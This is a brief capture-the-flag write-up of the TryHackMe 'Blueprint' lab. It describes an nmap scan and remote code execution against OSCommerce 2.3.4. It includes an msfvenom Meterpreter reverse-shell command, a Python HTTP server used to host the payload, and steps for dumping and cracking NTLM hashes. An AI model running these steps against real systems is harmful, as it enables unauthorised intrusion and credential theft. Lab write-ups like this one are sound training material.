CTF Writeup: Blueprint

Welcome to my CTF writeup for the Blueprint TryHackMe challenge. This writeup details the steps I followed to solve this Capture the Flag (CTF) challenge, including reconnaissance, exploitation, and privilege escalation techniques.

Reconnaissance

Target IP: 10.10.43.147

Initial Nmap Scan:

sudo nmap -sV -T4 10.10.43.147

During the scan, I discovered that the target was running OSCommerce 2.3.4, a vulnerable software version with multiple exploits available.

Notable vulnerability:

Exploit-DB 50128: Allows Remote Code Execution (RCE).

Exploitation

The vulnerability in OSCommerce was exploited using a Python payload to upload malicious PHP code to the `/catalog/install/configure.php` file. This code executed commands on the server, granting me RCE as NT AUTHORITY\SYSTEM.

Steps:

Downloaded and edited the Python exploit from Exploit-DB 44374.
Executed the payload to create a reverse shell.
Used the reverse shell to navigate the system and locate sensitive files (e.g., root.txt).

Privilege Escalation

To upgrade the shell and exfiltrate user hashes, I crafted a Meterpreter reverse shell payload using msfvenom:

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -f exe > payload.exe

Steps to execute:

Hosted the payload using a Python HTTP server: python3 -m http.server 8000.
Navigated to the vulnerable URL: `/oscommerce-2.3.4/catalog/install/includes/configure.php`.
The payload was downloaded and executed on the target system, upgrading the shell.

With the upgraded shell, I dumped NTLM hashes using hashdump, cracked them via hashes.com, and completed the challenge.

CTF Writeup: Blueprint

Reconnaissance

Exploitation

Privilege Escalation

References